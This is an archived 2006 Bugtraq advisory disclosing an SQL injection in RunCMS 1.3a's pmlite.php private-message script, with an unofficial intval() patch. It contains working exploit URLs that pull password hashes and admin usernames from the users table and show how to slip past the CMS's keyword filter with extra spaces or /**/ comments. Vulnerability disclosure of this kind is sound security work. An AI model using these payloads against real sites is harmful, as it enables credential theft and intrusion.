RUNCMS 1.3a SQL injection
- To: support@xxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, "content-editor@xxxxxxxxxxxxxxxxx" <content-editor@xxxxxxxxxxxxxxxxx>, "editor@xxxxxxxxxxxxxxxxx" <editor@xxxxxxxxxxxxxxxxx>, "expert@xxxxxxxxxxxxxx" <expert@xxxxxxxxxxxxxx>, "news-editor@xxxxxxxxxxxxxxxxx" <news-editor@xxxxxxxxxxxxxxxxx>, "vuldb@xxxxxxxxxxxxxxxxx" <vuldb@xxxxxxxxxxxxxxxxx>, "vuln@xxxxxxxxxxx" <vuln@xxxxxxxxxxx>, "webmaster@xxxxxxxxxxx" <webmaster@xxxxxxxxxxx>, "webmaster@xxxxxxxxxxxxxxxxx" <webmaster@xxxxxxxxxxxxxxxxx>
- Subject: RUNCMS 1.3a SQL injection
- From: h e <het_ebadi@xxxxxxxxx>
- Date: Wed, 15 Feb 2006 21:00:15 -0800 (PST)
- Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=hPtquZ2xEKV914wMtlQ3r5CEZiyxwOKbHXsPibwWnzpN3zyBGGeksA/8KSnGlD95jPtebTza4GtJLFA2qGlKJGb0ZHoZW/X9A+fzawzDisH4MUnWC/+SQQDP5G8wbFIOpLhGQbVFWq5Z2XGUo+g5dYP9zEiARqOsNM12Z8YurEk= ;
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
refrence:
http://www.runcms.org/public/modules/forum/viewtopic.php?topic_id=4003&forum=18
http://hamid.ir/security/
-----------------------------------------------
RUNCMS 1.3a SQL injection
Runcms Includes most things a webmaster would expect
from a cms: downloads, links, tutorials section,
polls, forums, news,
faq, contact form, rss feeds, file uploads, blogging
via xml-rpc, & more. Possibility to manage users as
groups with module/block specific access permissions,
and extend functioality via 3rd party module plug-ins
and ...
Original Author: The Xoops Project
http://www.xoops.org
http://www.runcms.org
Credit:
The information has been provided by Hamid Ebadi
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/
Vulnerable Systems:
tested on RUNCMS 1.3a and RUNCM 1.2 (and below ?)
Detail ::
Send Private Message
The following URL can be used to trigger an SQL
injection vulnerability in the pmlite.php [ but no
error will disply ! ]
http://localhost/modules/messages/pmlite.php?send=1&to_userid=-1[SQL
INJECTION]
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1
union select pass from runcms_users
internal RUNCMS protection will block this request and
redirect your browser to http://localhost/abuse.php
and you will see this warning:
" WARNING !!!!!! You were trying to abuse the
system, a logfile was created ..."
what is the problem ?
Bypassing Protection :
as i underestand RUNCMS just filter (union select)
and (union all select) and ....! but they forgot
(union select) !
exploit:
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
there is another way to bypass runcms internal
protection simply add " /**/ " in your query
exploit will be something like this :
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir
Unofficial Patch:
line 33 : pmlite.php
$to_userid = !empty($_POST['to_userid']) ?
$_POST['to_userid'] : $_GET['to_userid'];
// Hamid Ebadi (hamid Network Security Team): patch
for RUNCMS 1.3a and below .
$to_userid=intval($to_userid); //add this line plz
HAMID
$send = $_POST['send'];
Signature
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com